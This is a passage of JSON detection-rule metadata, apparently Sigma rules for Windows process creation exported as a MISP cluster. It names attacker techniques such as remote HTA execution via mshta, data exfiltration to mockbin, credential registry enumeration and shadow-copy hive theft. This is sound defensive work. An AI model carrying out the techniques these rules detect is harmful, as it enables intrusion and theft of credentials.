"logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file", "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", "https://twitter.com/max_mal_/status/1542461200797163522", "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", "value": "Suspicious Curl.EXE Download" }, { "description": "This rule detects execution of PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", "meta": { "author": "Agro (@agro_sev) oscd.community", "creation_date": "2020-10-10", "falsepositive": [ "Direct PS command execution through SQLPS.exe is uncommon; a child process sqlps.exe spawned by sqlagent.exe is a legitimate action." 
], "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", "https://twitter.com/bryon_/status/975835709587075072", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", "value": "Detection of PowerShell Execution via Sqlps.exe" }, { "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", "meta": { "author": "Trent Liffick", "creation_date": "2020-05-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_lnk.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lnk.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1202", "attack.t1027.003" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c2e147a9-d1a8-4074-811a-d8789202d916", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", "value": "Findstr Launching .lnk File" }, { "description": "Detects the execution of a renamed BOINC binary.", "meta": { "author": "Matt Anderson (Huntress)", "creation_date": "2024-07-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_boinc.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details", "https://boinc.berkeley.edu/", "https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_boinc.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553" ] }, "related": [ { "dest-uuid": "b83e166d-13d7-4b52-8677-dff90c548fd7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30d07da2-83ab-45d8-ae75-ec7c0edcaffc", "value": "Renamed BOINC Client Execution" }, { "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", "meta": { "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-03-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_appdata_local_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" 
], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "value": "Suspicious Schtasks Execution AppData Folder" }, { "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-19", "falsepositive": [ "Legitimate usage by some scripts might trigger this as well" ], "filename": "proc_creation_win_driverquery_recon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "value": "Potential Recon Activity Using DriverQuery.EXE" }, { "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", "meta": { "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Backup scenarios using the commandline" ], "filename": "proc_creation_win_cmd_shadowcopy_access.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "value": "Copy From VolumeShadowCopy Via Cmd.EXE" }, { "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", "meta": { "author": "Markus Neis, Sander Wiebing", "creation_date": "2018-11-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_file_characteristics.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", "https://securelist.com/muddywater/88059/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" ], "tags": [ "attack.execution", "attack.t1059.006" ] }, "related": [ { "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "value": "Suspicious File Characteristics Due to Missing Fields" }, { "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a 
system by an adversary may leave traces indicating what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", "meta": { "author": "frack113", "creation_date": "2022-01-15", "falsepositive": [ "False positive levels will differ depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity" ], "filename": "proc_creation_win_cmd_del_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", "value": "File Deletion Via Del" }, { "description": "Detects the execution of a Chromium based browser process with the \"headless\" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-09-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_chromium_mockbin_abuse.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/steal-it-campaign", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml" ], "tags": [ 
"attack.execution" ] }, "uuid": "1c526788-0abe-4713-862f-b520da5e5316", "value": "Chromium Browser Headless Execution To Mockbin Like Site" }, { "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_ftp.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", "value": "Renamed FTP.EXE Execution" }, { "description": "Detects the execution of \"gpg.exe\" from uncommon location. 
Often used by ransomware and loaders to decrypt/encrypt data.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-06", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_gpg4win_portable_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md", "https://securelist.com/locked-out/68960/", "https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "77df53a5-1d78-4f32-bc5a-0e7465bd8f41", "value": "Portable Gpg.EXE Execution" }, { "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "value": "Use of VSIISExeLauncher.exe" }, { 
"description": "Detects processes that query known 3rd party registry keys that hold credentials via the command line", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml" ], "tags": [ "attack.credential-access", "attack.t1552.002" ] }, "related": [ { "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", "value": "Enumeration for 3rd Party Creds From CLI" }, { "description": "Detects execution of \"curl.exe\" with the \"insecure\" flag over proxy or DOH.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Access to badly maintained internal or development systems" ], "filename": "proc_creation_win_curl_insecure_porxy_or_doh.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml" ], "tags": [ "attack.execution" ] }, "uuid": "2c1486f5-02e8-4f86-9099-b97f2da4ed77", "value": "Insecure Proxy/DOH Transfer Via Curl.EXE" }, 
{ "description": "Detects encoded base64 MZ header in the commandline", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_inline_base64_mz_header.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml" ], "tags": [ "attack.execution" ] }, "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "value": "Base64 MZ Header In CommandLine" }, { "description": "Detects the import of an alternate data stream to the registry with regedit.exe.", "meta": { "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regedit_import_keys_ads.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" ], "tags": [ "attack.t1112", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", "value": "Imports Registry Key From an ADS" }, { "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", "meta": { "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", "creation_date": "2017-06-12", "falsepositive": [ "Legitimate administrative tasks" ], "filename": 
"proc_creation_win_sysinternals_psexesvc.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml" ], "tags": [ "attack.execution" ] }, "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", "value": "PsExec Service Execution" }, { "description": "Detects the export of a critical Registry key to a file.", "meta": { "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Dumping hives for legitimate purpose i.e. backup or forensic investigation" ], "filename": "proc_creation_win_regedit_export_critical_keys.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" ], "tags": [ "attack.exfiltration", "attack.t1012" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", "value": "Exports Critical Registry Keys To a File" }, { "description": "Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe", "meta": { "author": "Austin Songer (@austinsonger)", "creation_date": "2021-10-21", "falsepositive": [ "Legitimate usage of stordiag.exe." 
], "filename": "proc_creation_win_stordiag_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/eral4m/status/1451112385041911809", "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", "value": "Execution via stordiag.exe" }, { "description": "Detects command line parameters or strings often used by crypto miners", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-26", "falsepositive": [ "Legitimate use of crypto miners", "Some build frameworks" ], "filename": "proc_creation_win_susp_crypto_mining_monero.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.poolwatch.io/coin/monero", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crypto_mining_monero.yml" ], "tags": [ "attack.impact", "attack.t1496" ] }, "related": [ { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "value": "Potential Crypto Mining Activity" }, { "description": "Detect the use of processes with no name (\".exe\"), which can be used to evade Image-based detections.", "meta": { "author": "Matt Anderson (Huntress)", "creation_date": "2024-07-23", "falsepositive": [ "Rare legitimate software." 
], "filename": "proc_creation_win_susp_no_image_name.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_no_image_name.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f208d6d8-d83a-4c2c-960d-877c37da84e5", "value": "Process Launched Without Image Name" }, { "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", "meta": { "author": "Alfie Champion (ajpc500)", "creation_date": "2021-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "value": "HackTool - F-Secure C3 Load by Rundll32" }, { "description": "Detects use of the Windows 8.3 short name, which could be used as a method to avoid Image detection", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2022-08-07", "falsepositive": [ "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." 
], "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)", "https://twitter.com/frack113/status/1555830623633375232", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", "value": "Use Short Name Path in Image" }, { "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "37e8d358-6408-4853-82f4-98333fca7014", "value": "Remote Access Tool - NetSupport Execution From Unusual Location" }, { "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dumpminitool_susp_execution.yml", "level": "high", 
"logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/", "https://twitter.com/mrd0x/status/1511415432888131586", "https://twitter.com/mrd0x/status/1511489821247684615", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", "value": "Suspicious DumpMinitool Execution" }, { "description": "Detects SILENTTRINITY stager use via PE metadata", "meta": { "author": "Aleksey Potapov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_silenttrinity_stager.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/byt3bl33d3r/SILENTTRINITY", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml" ], "tags": [ "attack.command-and-control", "attack.t1071" ] }, "related": [ { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", "value": "HackTool - SILENTTRINITY Stager Execution" }, { "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", "meta": { 
"author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-16", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_win_reg_software_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", "https://github.com/harleyQu1nn/AggressorScripts", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1518" ] }, "related": [ { "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", "value": "Detected Windows Software Discovery" }, { "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_customshellhost.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/", "https://github.com/LOLBAS-Project/LOLBAS/pull/180", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", "value": "Suspicious CustomShellHost Execution" }, { "description": "Detects execution of the \"mshta\" utility with an argument containing 
the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mshta_http.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218.005" ] }, "related": [ { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", "value": "Remotely Hosted HTA File Executed Via Mshta.EXE" }, { "description": "Detects uses of the createdump.exe LOLBIN utility to dump process memory", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-04", "falsepositive": [ "Command lines that use the same flags" ], "filename": "proc_creation_win_createdump_lolbin_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://twitter.com/bopin2020/status/1366400799199272960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
